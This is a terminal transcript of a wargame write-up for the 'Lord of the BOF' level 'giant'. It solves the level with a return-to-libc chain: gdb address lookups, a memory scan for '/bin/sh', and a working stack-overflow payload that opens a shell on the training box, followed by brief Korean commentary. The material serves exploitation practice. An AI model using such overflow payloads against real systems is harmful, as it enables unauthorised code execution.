login: giant
Password:
Login incorrect

login: bugbear
Password:
[bugbear@localhost bugbear]$ ls
giant  giant.c
[bugbear@localhost bugbear]$ cat giant.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - giant
        - RTL2
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/*
 * LOB "giant" (RTL2) challenge target, as shown by the session above/below.
 *
 * Security-relevant reading of this function:
 *  - buffer is 40 bytes.  fgets() is told it may write 255 bytes into it and
 *    strcpy() copies argv[1] with no bound at all: both are stack overflows.
 *    The strcpy() one is the intended bug.  Per the disassembly, buffer sits
 *    at ebp-40, so buffer+40 is the saved EBP and buffer+44 the return
 *    address of main.
 *  - The only input check is that argv[1][44..47] equals the address of
 *    __execve, computed at runtime as (libc base from ldd) + (symbol offset
 *    from nm).  Bytes beyond offset 47 are unchecked, which is what lets the
 *    session chain execve -> system -> exit -> "/bin/sh" on the stack: the
 *    earlier attempt without the "/bin/sh" address reached system() with a
 *    garbage argument ("sh: : command not found"), the later one got a shell.
 *  - The popen() command lines are fixed string literals, so argv cannot
 *    inject into them; but popen() streams must be closed with pclose(),
 *    not fclose() (pclose() also reaps the child).
 *  - If the ldd/nm pipeline produces no output (the copied binary printed
 *    "ldd: /home/giant/assassin: No such file or directory"), sscanf()
 *    matches nothing and lib_addr / execve_offset are left uninitialized.
 *  - memcpy() reads argv[1][44..47] without first checking that argv[1] is
 *    at least 48 bytes long.
 *  - Pre-C99 dialect: implicit int return type for main, and memcpy/strcpy
 *    are used without <string.h>.
 */
main(int argc, char *argv[])
{
        char buffer[40];
        FILE *fp;
        char *lib_addr, *execve_offset, *execve_addr;
        char *ret;

        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

        // gain address of execve
        // Step 1: libc load base for /home/giant/assassin, parsed from the
        // "(0x........)" column of ldd.  The 255 passed to fgets() exceeds
        // sizeof buffer (40): a latent overflow on its own.
        fp = popen("/usr/bin/ldd /home/giant/assassin | /bin/grep libc | /bin/awk '{print $4}'", "r");
        fgets(buffer, 255, fp);
        sscanf(buffer, "(%x)", &lib_addr);   /* %x into a char*: assumes sizeof(int) == sizeof(char*) */
        fclose(fp);                           /* should be pclose() for a popen() stream */

        // Step 2: offset of __execve inside libc from the nm symbol table.
        fp = popen("/usr/bin/nm /lib/libc.so.6 | /bin/grep __execve | /bin/awk '{print $1}'", "r");
        fgets(buffer, 255, fp);
        sscanf(buffer, "%x", &execve_offset);
        fclose(fp);                           /* should be pclose() */

        // base + offset.  In this session that is the same 0x400a9d48 gdb
        // prints for __execve (0x40018000 + 0x91d48).
        execve_addr = lib_addr + (int)execve_offset;
        // end

        // The 4 bytes that will land on main's saved return address
        // (buffer[44..47]) must be execve's address.  argv[1] is not
        // length-checked, so a shorter argument is read out of bounds here.
        memcpy(&ret, &(argv[1][44]), 4);
        if(ret != execve_addr)
        {
                printf("You must use execve!\n");
                exit(0);
        }

        // The intended vulnerability: unbounded copy of argv[1] into buffer[40].
        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);
}
[bugbear@localhost bugbear]$ ldd giant
        libc.so.6 => /lib/libc.so.6 (0x40018000)
        /lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x40000000)
[bugbear@localhost bugbear]$ nm /lib/libc.so.6 | grep execve
000f4860 ? __evoke_link_warning_fexecve
00091d48 t __execve
00091d48 W execve
00091da0 T fexecve
[bugbear@localhost bugbear]$ ls
giant  giant.c
[bugbear@localhost bugbear]$ cp gient giant
cp: gient: No such file or directory
[bugbear@localhost bugbear]$ cp giant jiant
[bugbear@localhost bugbear]$ rm jiant
[bugbear@localhost bugbear]$ cp giant jiant
[bugbear@localhost bugbear]$ ls
giant  giant.c  jiant
[bugbear@localhost bugbear]$ gdb -q jiant
(gdb) set disassembly-flavor intel
(gdb) disas main
Dump of assembler code for function main:
0x8048560 <main>:       push   %ebp
0x8048561 <main+1>:     mov    %ebp,%esp
0x8048563 <main+3>:     sub    %esp,60
0x8048566 <main+6>:     cmp    DWORD PTR [%ebp+8],1
0x804856a <main+10>:    jg     0x8048583 <main+35>
0x804856c <main+12>:    push   0x8048700
0x8048571 <main+17>:    call   0x8048444 <printf>
0x8048576 <main+22>:    add    %esp,4
0x8048579 <main+25>:    push   0
0x804857b <main+27>:    call   0x8048474 <exit>
0x8048580 <main+32>:    add    %esp,4
0x8048583 <main+35>:    push   0x804870c
0x8048588 <main+40>:    push   0x8048720
0x804858d <main+45>:    call   0x8048404 <popen>
0x8048592 <main+50>:    add    %esp,8
0x8048595 <main+53>:    mov    %eax,%eax
0x8048597 <main+55>:    mov    DWORD PTR [%ebp-44],%eax
0x804859a <main+58>:    mov    %eax,DWORD PTR [%ebp-44]
0x804859d <main+61>:    push   %eax
0x804859e <main+62>:    push   0xff
0x80485a3 <main+67>:    lea    %eax,[%ebp-40]
0x80485a6 <main+70>:    push   %eax
0x80485a7 <main+71>:    call   0x8048424 <fgets>
0x80485ac <main+76>:    add    %esp,12
0x80485af <main+79>:    lea    %eax,[%ebp-48]
0x80485b2 <main+82>:    push   %eax
0x80485b3 <main+83>:    push   0x804876b
0x80485b8 <main+88>:    lea    %eax,[%ebp-40]
0x80485bb <main+91>:    push   %eax
0x80485bc <main+92>:    call   0x8048484 <sscanf>
0x80485c1 <main+97>:    add    %esp,12
0x80485c4 <main+100>:   mov    %eax,DWORD PTR [%ebp-44]
0x80485c7 <main+103>:   push   %eax
0x80485c8 <main+104>:   call   0x8048464 <fclose>
0x80485cd <main+109>:   add    %esp,4
0x80485d0 <main+112>:   push   0x804870c
0x80485d5 <main+117>:   push   0x8048780
0x80485da <main+122>:   call   0x8048404 <popen>
0x80485df <main+127>:   add    %esp,8
0x80485e2 <main+130>:   mov    %eax,%eax
0x80485e4 <main+132>:   mov    DWORD PTR [%ebp-44],%eax
0x80485e7 <main+135>:   mov    %eax,DWORD PTR [%ebp-44]
0x80485ea <main+138>:   push   %eax
0x80485eb <main+139>:   push   0xff
0x80485f0 <main+144>:   lea    %eax,[%ebp-40]
0x80485f3 <main+147>:   push   %eax
0x80485f4 <main+148>:   call   0x8048424 <fgets>
0x80485f9 <main+153>:   add    %esp,12
0x80485fc <main+156>:   lea    %eax,[%ebp-52]
0x80485ff <main+159>:   push   %eax
0x8048600 <main+160>:   push   0x80487c8
0x8048605 <main+165>:   lea    %eax,[%ebp-40]
0x8048608 <main+168>:   push   %eax
0x8048609 <main+169>:   call   0x8048484 <sscanf>
0x804860e <main+174>:   add    %esp,12
0x8048611 <main+177>:   mov    %eax,DWORD PTR [%ebp-44]
0x8048614 <main+180>:   push   %eax
0x8048615 <main+181>:   call   0x8048464 <fclose>
0x804861a <main+186>:   add    %esp,4
0x804861d <main+189>:   mov    %eax,DWORD PTR [%ebp-48]
---Type <return> to continue, or q <return> to quit---
0x8048620 <main+192>:   mov    %edx,DWORD PTR [%ebp-52]
0x8048623 <main+195>:   lea    %ecx,[%edx+%eax*1]
0x8048626 <main+198>:   mov    DWORD PTR [%ebp-56],%ecx
0x8048629 <main+201>:   push   4
0x804862b <main+203>:   mov    %eax,DWORD PTR [%ebp+12]
0x804862e <main+206>:   add    %eax,4
0x8048631 <main+209>:   mov    %edx,DWORD PTR [%eax]
0x8048633 <main+211>:   add    %edx,44
0x8048636 <main+214>:   push   %edx
0x8048637 <main+215>:   lea    %eax,[%ebp-60]
0x804863a <main+218>:   push   %eax
0x804863b <main+219>:   call   0x8048454 <memcpy>
0x8048640 <main+224>:   add    %esp,12
0x8048643 <main+227>:   mov    %eax,DWORD PTR [%ebp-60]
0x8048646 <main+230>:   cmp    %eax,DWORD PTR [%ebp-56]
0x8048649 <main+233>:   je     0x8048662 <main+258>
0x804864b <main+235>:   push   0x80487cb
0x8048650 <main+240>:   call   0x8048444 <printf>
0x8048655 <main+245>:   add    %esp,4
0x8048658 <main+248>:   push   0
0x804865a <main+250>:   call   0x8048474 <exit>
0x804865f <main+255>:   add    %esp,4
0x8048662 <main+258>:   mov    %eax,DWORD PTR [%ebp+12]
0x8048665 <main+261>:   add    %eax,4
0x8048668 <main+264>:   mov    %edx,DWORD PTR [%eax]
0x804866a <main+266>:   push   %edx
0x804866b <main+267>:   lea    %eax,[%ebp-40]
0x804866e <main+270>:   push   %eax
0x804866f <main+271>:   call   0x8048494 <strcpy>
0x8048674 <main+276>:   add    %esp,8
0x8048677 <main+279>:   lea    %eax,[%ebp-40]
0x804867a <main+282>:   push   %eax
0x804867b <main+283>:   push   0x80487e1
0x8048680 <main+288>:   call   0x8048444 <printf>
0x8048685 <main+293>:   add    %esp,8
0x8048688 <main+296>:   leave
0x8048689 <main+297>:   ret
0x804868a <main+298>:   nop
0x804868b <main+299>:   nop
0x804868c <main+300>:   nop
0x804868d <main+301>:   nop
0x804868e <main+302>:   nop
0x804868f <main+303>:   nop
End of assembler dump.
(gdb) r "`python -c 'print "a"*48'`"
Starting program: /home/bugbear/jiant "`python -c 'print "a"*48'`"
ldd: /home/giant/assassin: No such file or directory
You must use execve!

Program exited normally.
(gdb) b*main+6
Breakpoint 1 at 0x8048566
(gdb) r "`python -c 'print "a"*48'`"
Starting program: /home/bugbear/jiant "`python -c 'print "a"*48'`"

Breakpoint 1, 0x8048566 in main ()
(gdb) x/100s 0xbfffffff-100
0xbfffff9b:      ";35:*.gif=01;35:*.bmp=01;35:*.xbm=01;35:*.xpm=01;35:*.png=01;35:*.tif=01;35:"
0xbfffffe8:      "/home/bugbear/jiant"
0xbffffffc:      ""
0xbffffffd:      ""
0xbffffffe:      ""
0xbfffffff:      ""
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
---Type <return> to continue, or q <return> to quit---
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
(gdb) x/12x 0xbfffff9b
0xbfffff9b:     0x3a35333b      0x69672e2a      0x31303d66      0x3a35333b
0xbfffffab:     0x6d622e2a      0x31303d70      0x3a35333b      0x62782e2a
0xbfffffbb:     0x31303d6d      0x3a35333b      0x70782e2a      0x31303d6d
(gdb)
[1]+  Stopped                 gdb -q jiant
[bugbear@localhost bugbear]$ clear
[bugbear@localhost bugbear]$ ls
giant  giant.c  jiant
[bugbear@localhost bugbear]$ nl giant.c
     1  /*
     2          The Lord of the BOF : The Fellowship of the BOF
     3          - giant
     4          - RTL2
     5  */

     6  #include <stdio.h>
     7  #include <stdlib.h>
     8  #include <unistd.h>

     9  main(int argc, char *argv[])
    10  {
    11          char buffer[40];
    12          FILE *fp;
    13          char *lib_addr, *execve_offset, *execve_addr;
    14          char *ret;

    15          if(argc < 2){
    16                  printf("argv error\n");
    17                  exit(0);
    18          }

    19          // gain address of execve
    20          fp = popen("/usr/bin/ldd /home/giant/assassin | /bin/grep libc | /bin/awk '{print $4}'", "r");
    21          fgets(buffer, 255, fp);
    22          sscanf(buffer, "(%x)", &lib_addr);
    23          fclose(fp);

    24          fp = popen("/usr/bin/nm /lib/libc.so.6 | /bin/grep __execve | /bin/awk '{print $1}'", "r");
    25          fgets(buffer, 255, fp);
    26          sscanf(buffer, "%x", &execve_offset);
    27          fclose(fp);

    28          execve_addr = lib_addr + (int)execve_offset;
    29          // end

    30          memcpy(&ret, &(argv[1][44]), 4);
    31          if(ret != execve_addr)
    32          {
    33                  printf("You must use execve!\n");
    34                  exit(0);
    35          }

    36          strcpy(buffer, argv[1]);
    37          printf("%s\n", buffer);
    38  }
[bugbear@localhost bugbear]$ gdb -q jiant
(gdb) b*main
Breakpoint 1 at 0x8048560
(gdb) r
Starting program: /home/bugbear/jiant

Breakpoint 1, 0x8048560 in main ()
(gdb) p system
$1 = {<text variable, no debug info>} 0x40058ae0 <__libc_system>
(gdb) p exit
$2 = {void (int)} 0x400391e0 <exit>
(gdb) p execve
$3 = {<text variable, no debug info>} 0x400a9d48 <__execve>
(gdb)
[2]+  Stopped                 gdb -q jiant
[bugbear@localhost bugbear]$ vi getaddr.c
[bugbear@localhost bugbear]$ ls
getaddr.c  giant  giant.c  jiant
[bugbear@localhost bugbear]$ gcc -o getaddr getaddr.c
[bugbear@localhost bugbear]$ ls
getaddr  getaddr.c  giant  giant.c  jiant
[bugbear@localhost bugbear]$ nl getaddr.c
#include <stdio.h>
#include <string.h>
/*
 * First attempt at finding the "/bin/sh" string that libc carries, by a
 * byte-wise linear scan of the address space.
 *
 * NOTE(review): the scan starts at address 0, so the very first memcmp()
 * dereferences the unmapped zero page (a null pointer read) and the program
 * faults before it ever reaches libc.  The rebuilt version further down
 * starts at the address of system() instead, which is known to be mapped.
 * The local named `system` is not libc's system() (<stdlib.h> is not
 * included); the name is just confusing.
 */
int main(){
        long system = 0x00000000;
        /* memcmp() returns 0 on a match; advance one byte at a time until then.
         * "/bin/sh\x00" with length 8 compares the terminator too. */
        while (memcmp((void*)system, "/bin/sh\x00", 8)){
                system++;
        }
        /* %x with a long argument: a format/argument mismatch that only
         * happens to work because int and long are both 32 bits on i386. */
        printf("/bin/sh: %x\n", system);
        return 0;
}
[bugbear@localhost bugbear]$ vi getaddr.c
[bugbear@localhost bugbear]$ rm getaddr
[bugbear@localhost bugbear]$ gcc -o getaddr getaddr.c
[bugbear@localhost bugbear]$ nl getaddr.c
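#include <stdio.h>
#include <string.h>

/*
 * Address gdb printed for system() in this session.  It lies inside libc's
 * text and is therefore certainly mapped, which is why the scan starts here
 * and not at 0 (the zero page is unmapped and would fault immediately).
 * The same address worked both under gdb and outside it, so the libc load
 * address is stable between runs on this target (no ASLR).
 */
#define SCAN_START 0x40058ae0UL

/*
 * The bytes to find.  system() itself passes "/bin/sh" to the shell, so
 * the string is guaranteed to exist somewhere in libc.  The terminating
 * NUL is compared as well (sizeof NEEDLE == 8), so a longer string that
 * merely starts with "/bin/sh" is not accepted.
 */
static const char NEEDLE[] = "/bin/sh";

/*
 * Locate "/bin/sh" inside libc so the return-to-libc chain can hand its
 * address to system() without placing the string in the payload.
 *
 * Walks upward from SCAN_START one byte at a time and prints the first
 * address whose 8 bytes equal "/bin/sh\0" (0x400fbff9 in this session).
 * Caveat: no upper bound is known from here; if the string were absent the
 * process would fault at the end of the mapping rather than report failure.
 */
int main(void)
{
        const unsigned char *p = (const unsigned char *)SCAN_START;

        /* memcmp() == 0 means the 8 bytes matched; otherwise keep walking. */
        while (memcmp(p, NEEDLE, sizeof NEEDLE) != 0) {
                p++;
        }

        /* %lx with an unsigned long matches the pointer width on i386
         * (the original used %x with a long, a format/argument mismatch);
         * the printed text is identical: "/bin/sh: 400fbff9". */
        printf("/bin/sh: %lx\n", (unsigned long)p);
        return 0;
}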
[bugbear@localhost bugbear]$ ./getaddr
/bin/sh: 400fbff9
[bugbear@localhost bugbear]$ ./giant "`python -c 'print "a"*44 + "\x48\x9d\x0a\x40" + "\xe0\x8a\x05\x40" + "\xe0\x91\x03\x40"'`"
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaH▒
@▒@▒@
[bugbear@localhost bugbear]$ bash2
[bugbear@localhost bugbear]$ gdb -q jiant
(gdb) b*main
Breakpoint 1 at 0x8048560
(gdb) r
Starting program: /home/bugbear/jiant

Breakpoint 1, 0x8048560 in main ()
(gdb) p system
$1 = {<text variable, no debug info>} 0x40058ae0 <__libc_system>
(gdb) p exit
$2 = {void (int)} 0x400391e0 <exit>
(gdb) p execve
$3 = {<text variable, no debug info>} 0x400a9d48 <__execve>
(gdb)
[1]+  Stopped                 gdb -q jiant
[bugbear@localhost bugbear]$ ./giant "`python -c 'print "a"*44 + "\x48\x9d\x0a\x40" + "\xe0\x8a\x05\x40" + "\xe0\x91\x03\x40"'`"
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaH▒
@▒@▒@
sh: : command not found
[bugbear@localhost bugbear]$ ./getaddr
/bin/sh: 400fbff9
[bugbear@localhost bugbear]$ ./giant "`python -c 'print "a"*44 + "\x48\x9d\x0a\x40" + "\xe0\x8a\x05\x40" + "\xe0\x91\x03\x40" + "\xf9\xbf\x0f\x40"'`"
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaH▒
@▒@▒@▒@
bash$ my-pass
euid = 514
one step closer
bash$

 

 

쉘코드 없이 따는과정이 너무 흥미롭구만

파이썬 명령 치환(`...`) 전체를 큰따옴표("")로 감싼 이유는 execve 주소 0x400a9d48에 들어 있는 \x0a(개행) 바이트 때문임. 따옴표 없이 두면 셸이 개행을 단어 구분자로 취급해 페이로드가 잘리므로, 큰따옴표로 감싸야 \x0a가 argv[1]에 그대로 전달됨
